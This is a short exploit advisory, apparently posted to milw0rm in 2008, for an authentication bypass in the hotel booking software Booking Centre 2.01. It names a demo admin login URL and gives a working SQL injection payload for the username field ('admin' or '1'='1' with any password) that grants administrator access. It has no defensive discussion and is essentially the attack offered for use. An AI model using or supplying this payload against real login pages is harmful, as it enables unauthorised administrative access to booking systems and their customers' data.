Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability -------------------------------------------------------------- Author: MrDoug E-mail: mrdoug13[at]gmail[dot]com -------------------------------------------------------------- Exploit: http://demo.hotelsadmin.com/admin/index.php Username == admin' or '1'='1 password == (whatever) -------------------------------------------------------------- Greetz to Slappywag -------------------------------------------------------------- # milw0rm.com [2008-11-28]